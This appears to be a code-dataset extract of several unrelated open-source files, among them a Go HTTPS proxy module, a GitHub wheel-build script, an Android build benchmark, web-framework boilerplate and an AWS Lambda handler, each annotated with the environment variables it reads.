DB.DropTableIfExists("level1_level2s")
DB.DropTableIfExists(new(Level1))
DB.DropTableIfExists(new(Level2))
if err := DB.AutoMigrate(new(Level1), new(Level2)).Error; err != nil {
t.Error(err)
}
lvl := Level1{
Name: "l1",
Level2s: []Level2{
Level2{Name: "l2-1"}, Level2{Name: "l2-2"},
},
}
DB.Save(&lvl)
called := 0
DB.Callback().Query().After("gorm:query").Register("TestPreloadManyToManyCallbacks", func(scope *gorm.Scope) {
called = called + 1
})
DB.Preload("Level2s").First(&Level1{}, "id = ?", lvl.ID)
if called != 3 {
t.Errorf("Wanted callback to be called 3 times but got %d", called)
}
}
func toJSONString(v interface{}) []byte {
r, _ := json.MarshalIndent(v, "", " ")
return r
}
| [
"\"GORM_DIALECT\""
]
| []
| [
"GORM_DIALECT"
]
| [] | ["GORM_DIALECT"] | go | 1 | 0 | |
mb.py | MAGIC_BUILD_REPO = "njsmith/cymem-wheels"
# We substitute the project name into this string to get the URL to clone:
DEFAULT_CLONE_TEMPLATE = "https://github.com/explosion/{}.git"
# All the statuses we want to wait for
# maps github name -> our display name
STATUSES = {
"continuous-integration/appveyor/branch": "appveyor",
"continuous-integration/travis-ci/push": "travis",
}
FINAL_STATES = {"error", "failure", "success"}
BAD_STATES = {"error", "failure"}
import os
import os.path
import sys
import glob
import json
from textwrap import dedent
import subprocess
from contextlib import contextmanager
import time
import github
import click
import requests
#github.enable_console_debug_logging()
# Hack to make urllib3 SSL support work on older macOS Python builds
# (In particular, as of 2018-08-24, this is necessary to allow multibuild's
# py35 to connect to github without "[SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1
# alert protocol version (_ssl.c:719)" errors.)
if sys.platform == "darwin":
import urllib3.contrib.securetransport
urllib3.contrib.securetransport.inject_into_urllib3()
def get_gh():
token_path = os.path.join(
os.path.dirname(__file__), "github-secret-token.txt"
)
if "GITHUB_SECRET_TOKEN" in os.environ:
token = os.environ["GITHUB_SECRET_TOKEN"]
elif os.path.exists(token_path):
with open("github-secret-token.txt") as f:
token = f.read().strip()
else:
raise RuntimeError(
"can't find github token (checked in GITHUB_SECRET_TOKEN envvar, "
"and {}".format(token_path)
)
return github.Github(token)
def get_release(repo_id, release_id):
gh = get_gh()
repo = gh.get_repo(repo_id)
# https://pygithub.readthedocs.io/en/latest/github_objects/GitRelease.html
release = repo.get_release(release_id)
if release is None:
raise RuntimeError("release not found:", release_id)
return release
def get_build_spec(build_spec_path):
with open(build_spec_path) as f:
return json.load(f)
################################################################
@click.group()
def cli():
pass
@cli.command()
@click.argument(
"build_spec",
type=click.Path(exists=True, dir_okay=False),
required=True
)
def build_spec_to_shell(build_spec):
bs = get_build_spec(build_spec)
sys.stdout.write(
"BUILD_SPEC_CLONE_URL='{clone-url}'\n"
"BUILD_SPEC_COMMIT='{commit}'\n"
"BUILD_SPEC_PACKAGE_NAME='{package-name}'\n"
.format(**bs)
)
def _do_upload(bs, paths):
upload_config = bs["upload-to"]
assert upload_config["type"] == "github-release"
release = get_release(upload_config["repo-id"], upload_config["release-id"])
# This is a gross hack, to work around the lack of globbing on Windows
# (see https://github.com/pallets/click/issues/1096)
# We accept either individual files, or directories, and for directories,
# we upload all the .whl files directly inside that directory (no
# recursion).
for given_path in paths:
if os.path.isdir(given_path):
subpaths = glob.glob(os.path.join(given_path, "*.whl"))
else:
subpaths = [given_path]
for actual_path in subpaths:
print("Uploading:", actual_path)
asset = release.upload_asset(actual_path)
print(asset)
print(asset.name, asset.id, asset.state, asset.created_at)
@cli.command()
@click.option(
"--build-spec",
type=click.Path(exists=True, dir_okay=False),
required=True
)
@click.argument(
"paths", nargs=-1, type=click.Path(exists=True)
)
def upload(build_spec, paths):
bs = get_build_spec(build_spec)
_do_upload(bs, paths)
@contextmanager
def cd(d):
orig_dir = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(orig_dir)
def run(cmd):
print("Running:", cmd)
subprocess.check_call(cmd)
@cli.command()
@click.option(
"--build-spec",
type=click.Path(exists=True, dir_okay=False),
required=True
)
def appveyor_build(build_spec):
bs = get_build_spec(build_spec)
run(["git", "clone", bs["clone-url"], "checkout"])
run(["pip", "install", "-Ur", "checkout\\requirements.txt"])
with cd("checkout"):
run(["git", "checkout", bs["commit"]])
run(["python", "setup.py", "bdist_wheel"])
wheels = glob.glob("checkout\\dist\\*.whl")
run(["pip", "install"] + wheels)
os.mkdir("tmp_for_test")
with cd("tmp_for_test"):
run(["pytest", "--pyargs", bs["package-name"]])
_do_upload(bs, wheels)
def _download_release_assets(repo_id, release_id):
print("Downloading to {}/...".format(release_id))
try:
os.mkdir(release_id)
except OSError:
pass
with requests.Session() as s:
release = get_release(repo_id, release_id)
for asset in release.get_assets():
print(" " + asset.name)
save_name = os.path.join(release_id, asset.name)
r = s.get(asset.browser_download_url)
with open(save_name, "wb") as f:
f.write(r.content)
print("...all done! See {}/ for your wheels.".format(release_id))
@cli.command(name="magic-build")
@click.option("--magic-build-repo-id", default=MAGIC_BUILD_REPO)
@click.option("--clone-url")
@click.argument("package-name", required=True)
@click.argument("commit", required=True)
def magic_build(magic_build_repo_id, clone_url, package_name, commit):
if clone_url is None:
clone_url = DEFAULT_CLONE_TEMPLATE.format(package_name)
repo = get_gh().get_repo(magic_build_repo_id)
print("Finding a unique name for this release...")
# Pick the release_name by finding an unused one
i = 1
while True:
release_name = "{}-{}-wheels".format(package_name, commit)
if i > 1:
release_name += "-{}".format(i)
try:
repo.get_release(release_name)
except github.UnknownObjectException:
break
i += 1
branch_name = "branch-for-" + release_name
bs = {
"clone-url": clone_url,
"package-name": package_name,
"commit": commit,
"upload-to": {
"type": "github-release",
"repo-id": MAGIC_BUILD_REPO,
"release-id": release_name,
},
}
bs_json = json.dumps(bs)
print("Creating release {!r} to collect assets...".format(release_name))
release = repo.create_git_release(
release_name,
release_name,
"Build spec:\n\n```json\n{}\n```".format(bs_json),
)
print(" {}".format(release.html_url))
print("Creating build branch...".format(MAGIC_BUILD_REPO))
# 'master' is a 'Commit'. 'master.commit' is a 'GitCommit'. These are
# different types that are mostly *not* interchangeable:
# https://pygithub.readthedocs.io/en/latest/github_objects/Commit.html
# https://pygithub.readthedocs.io/en/latest/github_objects/GitCommit.html
master = repo.get_commit("master")
master_gitcommit = master.commit
patch = github.InputGitTreeElement(
"build-spec.json", "100644", "blob", content=bs_json,
)
tree = repo.create_git_tree([patch], master_gitcommit.tree)
our_gitcommit = repo.create_git_commit(
"Building: {}".format(release_name), tree, [master_gitcommit]
)
repo.create_git_ref("refs/heads/" + branch_name, our_gitcommit.sha)
print(" Commit is {} in branch {!r}."
.format(our_gitcommit.sha[:8], branch_name))
print("Waiting for build to complete...")
# get_combined_status needs a Commit, not a GitCommit
our_commit = repo.get_commit(our_gitcommit.sha)
showed_urls = {}
while True:
time.sleep(10)
combined_status = our_commit.get_combined_status()
display_name_to_state = {}
for display_name in STATUSES.values():
display_name_to_state[display_name] = "not available"
for status in combined_status.statuses:
if status.context in STATUSES:
display_name = STATUSES[status.context]
display_name_to_state[display_name] = status.state
if display_name not in showed_urls:
print(" {} logs: {}".format(
display_name, status.target_url
))
showed_urls[display_name] = status.target_url
displays = [
"[{} - {}]".format(display_name, state)
for (display_name, state) in display_name_to_state.items()
]
print(" ".join(displays))
pending = False
failed = False
# The Github states are: "error", "failure", "success", "pending"
for state in display_name_to_state.values():
if state not in FINAL_STATES:
pending = True
if state in BAD_STATES:
failed = True
if failed or not pending:
break
if failed:
print("*** Failed! ***")
for display_name, url in showed_urls.items():
print(" {} logs: {}".format(display_name, url))
sys.exit(1)
else:
_download_release_assets(magic_build_repo_id, release_name)
@cli.command(name="download-release-assets")
@click.option("--repo-id", default=MAGIC_BUILD_REPO)
@click.argument("release-id", required=True)
def download_release_assets(repo_id, release_id):
_download_release_assets(repo_id, release_id)
if __name__ == "__main__":
cli()
| []
| []
| [
"GITHUB_SECRET_TOKEN"
]
| [] | ["GITHUB_SECRET_TOKEN"] | python | 1 | 0 | |
https.go | package goproxy
import (
"bufio"
"crypto/tls"
"errors"
"io"
"io/ioutil"
"net"
"net/http"
"net/url"
"os"
"regexp"
"strings"
"sync"
"sync/atomic"
)
type ConnectActionLiteral int
const (
ConnectAccept = iota
ConnectReject
ConnectMitm
ConnectHijack
ConnectHTTPMitm
ConnectProxyAuthHijack
)
var (
OkConnect = &ConnectAction{Action: ConnectAccept, TLSConfig: TLSConfigFromCA(&GoproxyCa)}
MitmConnect = &ConnectAction{Action: ConnectMitm, TLSConfig: TLSConfigFromCA(&GoproxyCa)}
HTTPMitmConnect = &ConnectAction{Action: ConnectHTTPMitm, TLSConfig: TLSConfigFromCA(&GoproxyCa)}
RejectConnect = &ConnectAction{Action: ConnectReject, TLSConfig: TLSConfigFromCA(&GoproxyCa)}
httpsRegexp = regexp.MustCompile(`^https:\/\/`)
)
// ConnectAction enables the caller to override the standard connect flow.
// When Action is ConnectHijack, it is up to the implementer to send the
// HTTP 200, or any other valid http response back to the client from within the
// Hijack func
type ConnectAction struct {
Action ConnectActionLiteral
Hijack func(req *http.Request, client net.Conn, ctx *ProxyCtx)
TLSConfig func(host string, ctx *ProxyCtx) (*tls.Config, error)
}
func stripPort(s string) string {
ix := strings.IndexRune(s, ':')
if ix == -1 {
return s
}
return s[:ix]
}
func (proxy *ProxyHttpServer) dial(network, addr string) (c net.Conn, err error) {
if proxy.Tr.Dial != nil {
return proxy.Tr.Dial(network, addr)
}
return net.Dial(network, addr)
}
func (proxy *ProxyHttpServer) connectDial(network, addr string) (c net.Conn, err error) {
if proxy.ConnectDial == nil {
return proxy.dial(network, addr)
}
return proxy.ConnectDial(network, addr)
}
type halfClosable interface {
net.Conn
CloseWrite() error
CloseRead() error
}
var _ halfClosable = (*net.TCPConn)(nil)
func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request) {
ctx := &ProxyCtx{Req: r, Session: atomic.AddInt64(&proxy.sess, 1), proxy: proxy, certStore: proxy.CertStore}
hij, ok := w.(http.Hijacker)
if !ok {
panic("httpserver does not support hijacking")
}
proxyClient, _, e := hij.Hijack()
if e != nil {
panic("Cannot hijack connection " + e.Error())
}
ctx.Logf("Running %d CONNECT handlers", len(proxy.httpsHandlers))
todo, host := OkConnect, r.URL.Host
for i, h := range proxy.httpsHandlers {
newtodo, newhost := h.HandleConnect(host, ctx)
// If found a result, break the loop immediately
if newtodo != nil {
todo, host = newtodo, newhost
ctx.Logf("on %dth handler: %v %s", i, todo, host)
break
}
}
switch todo.Action {
case ConnectAccept:
if !hasPort.MatchString(host) {
host += ":80"
}
targetSiteCon, err := proxy.connectDial("tcp", host)
if err != nil {
httpError(proxyClient, ctx, err)
return
}
ctx.Logf("Accepting CONNECT to %s", host)
proxyClient.Write([]byte("HTTP/1.0 200 Connection established\r\n\r\n"))
targetTCP, targetOK := targetSiteCon.(halfClosable)
proxyClientTCP, clientOK := proxyClient.(halfClosable)
if targetOK && clientOK {
// todo: make sure everything is fine
go func() {
var wg sync.WaitGroup
wg.Add(2)
go copyAndClose(ctx, targetTCP, proxyClientTCP, &wg)
go copyAndClose(ctx, proxyClientTCP, targetTCP, &wg)
wg.Wait()
proxyClientTCP.Close()
targetTCP.Close()
}()
} else {
go func() {
var wg sync.WaitGroup
wg.Add(2)
go copyOrWarn(ctx, targetSiteCon, proxyClient, &wg)
go copyOrWarn(ctx, proxyClient, targetSiteCon, &wg)
wg.Wait()
proxyClient.Close()
targetSiteCon.Close()
}()
}
case ConnectHijack:
ctx.Logf("Hijacking CONNECT to %s", host)
todo.Hijack(r, proxyClient, ctx)
case ConnectHTTPMitm:
proxyClient.Write([]byte("HTTP/1.0 200 OK\r\n\r\n"))
ctx.Logf("Assuming CONNECT is plain HTTP tunneling, mitm proxying it")
targetSiteCon, err := proxy.connectDial("tcp", host)
if err != nil {
ctx.Warnf("Error dialing to %s: %s", host, err.Error())
return
}
for {
client := bufio.NewReader(proxyClient)
remote := bufio.NewReader(targetSiteCon)
req, err := http.ReadRequest(client)
if err != nil && err != io.EOF {
ctx.Warnf("cannot read request of MITM HTTP client: %+#v", err)
}
if err != nil {
return
}
req, resp := proxy.filterRequest(req, ctx)
if resp == nil {
if err := req.Write(targetSiteCon); err != nil {
httpError(proxyClient, ctx, err)
return
}
resp, err = http.ReadResponse(remote, req)
if err != nil {
httpError(proxyClient, ctx, err)
return
}
defer resp.Body.Close()
}
resp = proxy.filterResponse(resp, ctx)
if err := resp.Write(proxyClient); err != nil {
httpError(proxyClient, ctx, err)
return
}
}
case ConnectMitm:
proxyClient.Write([]byte("HTTP/1.0 200 OK\r\n\r\n"))
ctx.Logf("Assuming CONNECT is TLS, mitm proxying it")
// this goes in a separate goroutine, so that the net/http server won't think we're
// still handling the request even after hijacking the connection. Those HTTP CONNECT
// request can take forever, and the server will be stuck when "closed".
// TODO: Allow Server.Close() mechanism to shut down this connection as nicely as possible
tlsConfig := defaultTLSConfig
if todo.TLSConfig != nil {
var err error
tlsConfig, err = todo.TLSConfig(host, ctx)
if err != nil {
httpError(proxyClient, ctx, err)
return
}
}
go func() {
//TODO: cache connections to the remote website
rawClientTls := tls.Server(proxyClient, tlsConfig)
if err := rawClientTls.Handshake(); err != nil {
ctx.Warnf("Cannot handshake client %v %v", r.Host, err)
return
}
defer rawClientTls.Close()
clientTlsReader := bufio.NewReader(rawClientTls)
for !isEof(clientTlsReader) {
req, err := http.ReadRequest(clientTlsReader)
var ctx = &ProxyCtx{Req: req, Session: atomic.AddInt64(&proxy.sess, 1), proxy: proxy, UserData: ctx.UserData}
if err != nil && err != io.EOF {
return
}
if err != nil {
ctx.Warnf("Cannot read TLS request from mitm'd client %v %v", r.Host, err)
return
}
req.RemoteAddr = r.RemoteAddr // since we're converting the request, need to carry over the original connecting IP as well
ctx.Logf("req %v", r.Host)
if !httpsRegexp.MatchString(req.URL.String()) {
req.URL, err = url.Parse("https://" + r.Host + req.URL.String())
}
// Bug fix which goproxy fails to provide request
// information URL in the context when does HTTPS MITM
ctx.Req = req
req, resp := proxy.filterRequest(req, ctx)
if resp == nil {
if isWebSocketRequest(req) {
ctx.Logf("Request looks like websocket upgrade.")
proxy.serveWebsocketTLS(ctx, w, req, tlsConfig, rawClientTls)
return
}
if err != nil {
ctx.Warnf("Illegal URL %s", "https://"+r.Host+req.URL.Path)
return
}
removeProxyHeaders(ctx, req)
resp, err = ctx.RoundTrip(req)
if err != nil {
ctx.Warnf("Cannot read TLS response from mitm'd server %v", err)
return
}
ctx.Logf("resp %v", resp.Status)
}
resp = proxy.filterResponse(resp, ctx)
// the underlying Transport will close the client request body.
// https://github.com/golang/go/blob/ab5d9f5831cd267e0d8e8954cfe9987b737aec9c/src/net/http/request.go#L179-L182
// defer resp.Body.Close()
if err := resp.Write(rawClientTls); err != nil {
ctx.Warnf("Cannot write TLS response from mitm'd client: %v", err)
return
}
}
ctx.Logf("Exiting on EOF")
}()
case ConnectProxyAuthHijack:
proxyClient.Write([]byte("HTTP/1.1 407 Proxy Authentication Required\r\n"))
todo.Hijack(r, proxyClient, ctx)
case ConnectReject:
if ctx.Resp != nil {
if err := ctx.Resp.Write(proxyClient); err != nil {
ctx.Warnf("Cannot write response that reject http CONNECT: %v", err)
}
}
proxyClient.Close()
}
}
func httpError(w io.WriteCloser, ctx *ProxyCtx, err error) {
if _, err := io.WriteString(w, "HTTP/1.1 502 Bad Gateway\r\n\r\n"); err != nil {
ctx.Warnf("Error responding to client: %s", err)
}
if err := w.Close(); err != nil {
ctx.Warnf("Error closing client connection: %s", err)
}
}
func copyOrWarn(ctx *ProxyCtx, dst io.Writer, src io.Reader, wg *sync.WaitGroup) {
if _, err := io.Copy(dst, src); err != nil {
ctx.Warnf("Error copying to client: %s", err)
}
wg.Done()
}
func copyAndClose(ctx *ProxyCtx, dst, src halfClosable, wg *sync.WaitGroup) {
if _, err := io.Copy(dst, src); err != nil {
ctx.Warnf("Error copying to client: %s", err)
}
dst.CloseWrite()
src.CloseRead()
wg.Done()
}
func dialerFromEnv(proxy *ProxyHttpServer) func(network, addr string) (net.Conn, error) {
https_proxy := os.Getenv("HTTPS_PROXY")
if https_proxy == "" {
https_proxy = os.Getenv("https_proxy")
}
if https_proxy == "" {
return nil
}
return proxy.NewConnectDialToProxy(https_proxy)
}
func (proxy *ProxyHttpServer) NewConnectDialToProxy(https_proxy string) func(network, addr string) (net.Conn, error) {
return proxy.NewConnectDialToProxyWithHandler(https_proxy, nil)
}
func (proxy *ProxyHttpServer) NewConnectDialToProxyWithHandler(https_proxy string, connectReqHandler func(req *http.Request)) func(network, addr string) (net.Conn, error) {
u, err := url.Parse(https_proxy)
if err != nil {
return nil
}
if u.Scheme == "" || u.Scheme == "http" {
if strings.IndexRune(u.Host, ':') == -1 {
u.Host += ":80"
}
return func(network, addr string) (net.Conn, error) {
connectReq := &http.Request{
Method: "CONNECT",
URL: &url.URL{Opaque: addr},
Host: addr,
Header: make(http.Header),
}
if connectReqHandler != nil {
connectReqHandler(connectReq)
}
c, err := proxy.dial(network, u.Host)
if err != nil {
return nil, err
}
connectReq.Write(c)
// Read response.
// Okay to use and discard buffered reader here, because
// TLS server will not speak until spoken to.
br := bufio.NewReader(c)
resp, err := http.ReadResponse(br, connectReq)
if err != nil {
c.Close()
return nil, err
}
defer resp.Body.Close()
if resp.StatusCode != 200 {
resp, err := ioutil.ReadAll(resp.Body)
if err != nil {
return nil, err
}
c.Close()
return nil, errors.New("proxy refused connection" + string(resp))
}
return c, nil
}
}
if u.Scheme == "https" || u.Scheme == "wss" {
if strings.IndexRune(u.Host, ':') == -1 {
u.Host += ":443"
}
return func(network, addr string) (net.Conn, error) {
c, err := proxy.dial(network, u.Host)
if err != nil {
return nil, err
}
c = tls.Client(c, proxy.Tr.TLSClientConfig)
connectReq := &http.Request{
Method: "CONNECT",
URL: &url.URL{Opaque: addr},
Host: addr,
Header: make(http.Header),
}
if connectReqHandler != nil {
connectReqHandler(connectReq)
}
connectReq.Write(c)
// Read response.
// Okay to use and discard buffered reader here, because
// TLS server will not speak until spoken to.
br := bufio.NewReader(c)
resp, err := http.ReadResponse(br, connectReq)
if err != nil {
c.Close()
return nil, err
}
defer resp.Body.Close()
if resp.StatusCode != 200 {
body, err := ioutil.ReadAll(io.LimitReader(resp.Body, 500))
if err != nil {
return nil, err
}
c.Close()
return nil, errors.New("proxy refused connection" + string(body))
}
return c, nil
}
}
return nil
}
func TLSConfigFromCA(ca *tls.Certificate) func(host string, ctx *ProxyCtx) (*tls.Config, error) {
return func(host string, ctx *ProxyCtx) (*tls.Config, error) {
var err error
var cert *tls.Certificate
hostname := stripPort(host)
config := *defaultTLSConfig
ctx.Logf("signing for %s", stripPort(host))
genCert := func() (*tls.Certificate, error) {
return signHost(*ca, []string{hostname})
}
if ctx.certStore != nil {
cert, err = ctx.certStore.Fetch(hostname, genCert)
} else {
cert, err = genCert()
}
if err != nil {
ctx.Warnf("Cannot sign host certificate with provided CA: %s", err)
return nil, err
}
config.Certificates = append(config.Certificates, *cert)
return &config, nil
}
}
| [
"\"HTTPS_PROXY\"",
"\"https_proxy\""
]
| []
| [
"HTTPS_PROXY",
"https_proxy"
]
| [] | ["HTTPS_PROXY", "https_proxy"] | go | 2 | 0 | |
cuj/cuj.go | // Copyright 2019 Google Inc. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// This executable runs a series of build commands to test and benchmark some critical user journeys.
package main
import (
"context"
"fmt"
"os"
"path/filepath"
"strconv"
"strings"
"time"
"android/soong/ui/build"
"android/soong/ui/logger"
"android/soong/ui/metrics"
"android/soong/ui/status"
"android/soong/ui/terminal"
"android/soong/ui/tracer"
)
type Test struct {
name string
args []string
before func() error
results TestResults
}
type TestResults struct {
metrics *metrics.Metrics
err error
}
// Run runs a single build command. It emulates the "m" command line by calling into Soong UI directly.
func (t *Test) Run(logsDir string) {
output := terminal.NewStatusOutput(os.Stdout, "", false, false)
log := logger.New(output)
defer log.Cleanup()
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
trace := tracer.New(log)
defer trace.Close()
met := metrics.New()
stat := &status.Status{}
defer stat.Finish()
stat.AddOutput(output)
stat.AddOutput(trace.StatusTracer())
build.SetupSignals(log, cancel, func() {
trace.Close()
log.Cleanup()
stat.Finish()
})
buildCtx := build.Context{ContextImpl: &build.ContextImpl{
Context: ctx,
Logger: log,
Metrics: met,
Tracer: trace,
Writer: output,
Status: stat,
}}
defer logger.Recover(func(err error) {
t.results.err = err
})
config := build.NewConfig(buildCtx, t.args...)
build.SetupOutDir(buildCtx, config)
os.MkdirAll(logsDir, 0777)
log.SetOutput(filepath.Join(logsDir, "soong.log"))
trace.SetOutput(filepath.Join(logsDir, "build.trace"))
stat.AddOutput(status.NewVerboseLog(log, filepath.Join(logsDir, "verbose.log")))
stat.AddOutput(status.NewErrorLog(log, filepath.Join(logsDir, "error.log")))
stat.AddOutput(status.NewProtoErrorLog(log, filepath.Join(logsDir, "build_error")))
stat.AddOutput(status.NewCriticalPath(log))
defer met.Dump(filepath.Join(logsDir, "soong_metrics"))
if start, ok := os.LookupEnv("TRACE_BEGIN_SOONG"); ok {
if !strings.HasSuffix(start, "N") {
if start_time, err := strconv.ParseUint(start, 10, 64); err == nil {
log.Verbosef("Took %dms to start up.",
time.Since(time.Unix(0, int64(start_time))).Nanoseconds()/time.Millisecond.Nanoseconds())
buildCtx.CompleteTrace(metrics.RunSetupTool, "startup", start_time, uint64(time.Now().UnixNano()))
}
}
if executable, err := os.Executable(); err == nil {
trace.ImportMicrofactoryLog(filepath.Join(filepath.Dir(executable), "."+filepath.Base(executable)+".trace"))
}
}
f := build.NewSourceFinder(buildCtx, config)
defer f.Shutdown()
build.FindSources(buildCtx, config, f)
build.Build(buildCtx, config, build.BuildAll)
t.results.metrics = met
}
// Touch the Intent.java file to cause a rebuild of the frameworks to monitor the
// incremental build speed as mentioned b/152046247. Intent.java file was chosen
// as it is a key component of the framework and is often modified.
func touchIntentFile() error {
const intentFileName = "frameworks/base/core/java/android/content/Intent.java"
currentTime := time.Now().Local()
return os.Chtimes(intentFileName, currentTime, currentTime)
}
func main() {
outDir := os.Getenv("OUT_DIR")
if outDir == "" {
outDir = "out"
}
cujDir := filepath.Join(outDir, "cuj_tests")
// Use a subdirectory for the out directory for the tests to keep them isolated.
os.Setenv("OUT_DIR", filepath.Join(cujDir, "out"))
// Each of these tests is run in sequence without resetting the output tree. The state of the output tree will
// affect each successive test. To maintain the validity of the benchmarks across changes, care must be taken
// to avoid changing the state of the tree when a test is run. This is most easily accomplished by adding tests
// at the end.
tests := []Test{
{
// Reset the out directory to get reproducible results.
name: "clean",
args: []string{"clean"},
},
{
// Parse the build files.
name: "nothing",
args: []string{"nothing"},
},
{
// Parse the build files again to monitor issues like globs rerunning.
name: "nothing_rebuild",
args: []string{"nothing"},
},
{
// Parse the build files again, this should always be very short.
name: "nothing_rebuild_twice",
args: []string{"nothing"},
},
{
// Build the framework as a common developer task and one that keeps getting longer.
name: "framework",
args: []string{"framework"},
},
{
// Build the framework again to make sure it doesn't rebuild anything.
name: "framework_rebuild",
args: []string{"framework"},
},
{
// Build the framework again to make sure it doesn't rebuild anything even if it did the second time.
name: "framework_rebuild_twice",
args: []string{"framework"},
},
{
// Scenario major_inc_build (b/152046247): tracking build speed of major incremental build.
name: "major_inc_build_droid",
args: []string{"droid"},
},
{
name: "major_inc_build_framework_minus_apex_after_droid_build",
args: []string{"framework-minus-apex"},
before: touchIntentFile,
},
{
name: "major_inc_build_framework_after_droid_build",
args: []string{"framework"},
before: touchIntentFile,
},
{
name: "major_inc_build_sync_after_droid_build",
args: []string{"sync"},
before: touchIntentFile,
},
{
name: "major_inc_build_droid_rebuild",
args: []string{"droid"},
before: touchIntentFile,
},
{
name: "major_inc_build_update_api_after_droid_rebuild",
args: []string{"update-api"},
before: touchIntentFile,
},
}
cujMetrics := metrics.NewCriticalUserJourneysMetrics()
defer cujMetrics.Dump(filepath.Join(cujDir, "logs", "cuj_metrics.pb"))
for i, t := range tests {
logsSubDir := fmt.Sprintf("%02d_%s", i, t.name)
logsDir := filepath.Join(cujDir, "logs", logsSubDir)
if t.before != nil {
if err := t.before(); err != nil {
fmt.Printf("error running before function on test %q: %v\n", t.name, err)
break
}
}
t.Run(logsDir)
if t.results.err != nil {
fmt.Printf("error running test %q: %s\n", t.name, t.results.err)
break
}
if t.results.metrics != nil {
cujMetrics.Add(t.name, t.results.metrics)
}
}
}
| [
"\"OUT_DIR\""
]
| []
| [
"OUT_DIR"
]
| [] | ["OUT_DIR"] | go | 1 | 0 | |
backend/thunder/__init__.py | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import os
app = Flask(__name__, static_url_path='', static_folder='../../front/src/')
app.config.from_object(os.environ['APP_SETTINGS'])
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
from thunder import views
| []
| []
| [
"APP_SETTINGS"
]
| [] | ["APP_SETTINGS"] | python | 1 | 0 | |
python/django/opendirectory_gui/manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "opendirectory_gui.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| []
| []
| []
| [] | [] | python | 0 | 0 | |
firstcontact/firstcontact/wsgi.py | """
WSGI config for firstcontact project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'firstcontact.settings')
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
tests/integration/conftest.py | import os
import pytest
from hcloud import Client
@pytest.fixture(autouse=True, scope='function')
def hetzner_client():
hetzner_client = Client(token="test-token", api_endpoint=os.getenv("FAKE_API_ENDPOINT", default="http://localhost:4000"))
return hetzner_client
| []
| []
| [
"FAKE_API_ENDPOINT"
]
| [] | ["FAKE_API_ENDPOINT"] | python | 1 | 0 | |
tools/omnissm/functions/register/main.go | // Copyright 2018 Capital One Services, LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"context"
"encoding/json"
"fmt"
"os"
"github.com/aws/aws-lambda-go/events"
"github.com/aws/aws-sdk-go/aws"
"github.com/capitalone/cloud-custodian/tools/omnissm/pkg/api"
"github.com/capitalone/cloud-custodian/tools/omnissm/pkg/apiutil"
"github.com/capitalone/cloud-custodian/tools/omnissm/pkg/identity"
"github.com/capitalone/cloud-custodian/tools/omnissm/pkg/manager"
)
var (
// The DynamodDb table used for storing instance regisrations.
RegistrationsTable = os.Getenv("OMNISSM_REGISTRATIONS_TABLE")
// The instance role used by the SSM agent
InstanceRole = os.Getenv("OMNISSM_INSTANCE_ROLE")
// The list of accounts authorized to use the register API
AccountWhitelist = os.Getenv("OMNISSM_ACCOUNT_WHITELIST")
mgr *manager.Manager
)
func init() {
mgr = manager.NewManager(&manager.Config{
Config: aws.NewConfig(),
RegistrationsTable: RegistrationsTable,
InstanceRole: InstanceRole,
})
}
func main() {
apiutil.Start(func(ctx context.Context, req events.APIGatewayProxyRequest) (*events.APIGatewayProxyResponse, error) {
whitelist := identity.NewWhitelist(AccountWhitelist)
r := api.RegistrationHandler{mgr}
switch req.Resource {
case "/register":
var registerReq api.RegistrationRequest
if err := json.Unmarshal([]byte(req.Body), ®isterReq); err != nil {
return nil, err
}
if err := registerReq.Verify(); err != nil {
return nil, err
}
if !whitelist.Exists(registerReq.Identity().AccountId) {
return nil, identity.ErrUnauthorizedAccount
}
switch req.HTTPMethod {
case "POST":
return apiutil.JSON(r.Create(ctx, ®isterReq))
case "PATCH":
return apiutil.JSON(r.Update(ctx, ®isterReq))
}
}
return nil, apiutil.NotFoundError{fmt.Sprintf("cannot find resource %#v", req.Resource)}
})
}
| [
"\"OMNISSM_REGISTRATIONS_TABLE\"",
"\"OMNISSM_INSTANCE_ROLE\"",
"\"OMNISSM_ACCOUNT_WHITELIST\""
]
| []
| [
"OMNISSM_ACCOUNT_WHITELIST",
"OMNISSM_INSTANCE_ROLE",
"OMNISSM_REGISTRATIONS_TABLE"
]
| [] | ["OMNISSM_ACCOUNT_WHITELIST", "OMNISSM_INSTANCE_ROLE", "OMNISSM_REGISTRATIONS_TABLE"] | go | 3 | 0 | |
lexpredict_openedgar/lexpredict_openedgar/taskapp/celery.py | """
MIT License
Copyright (c) 2018 ContraxSuite, LLC
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
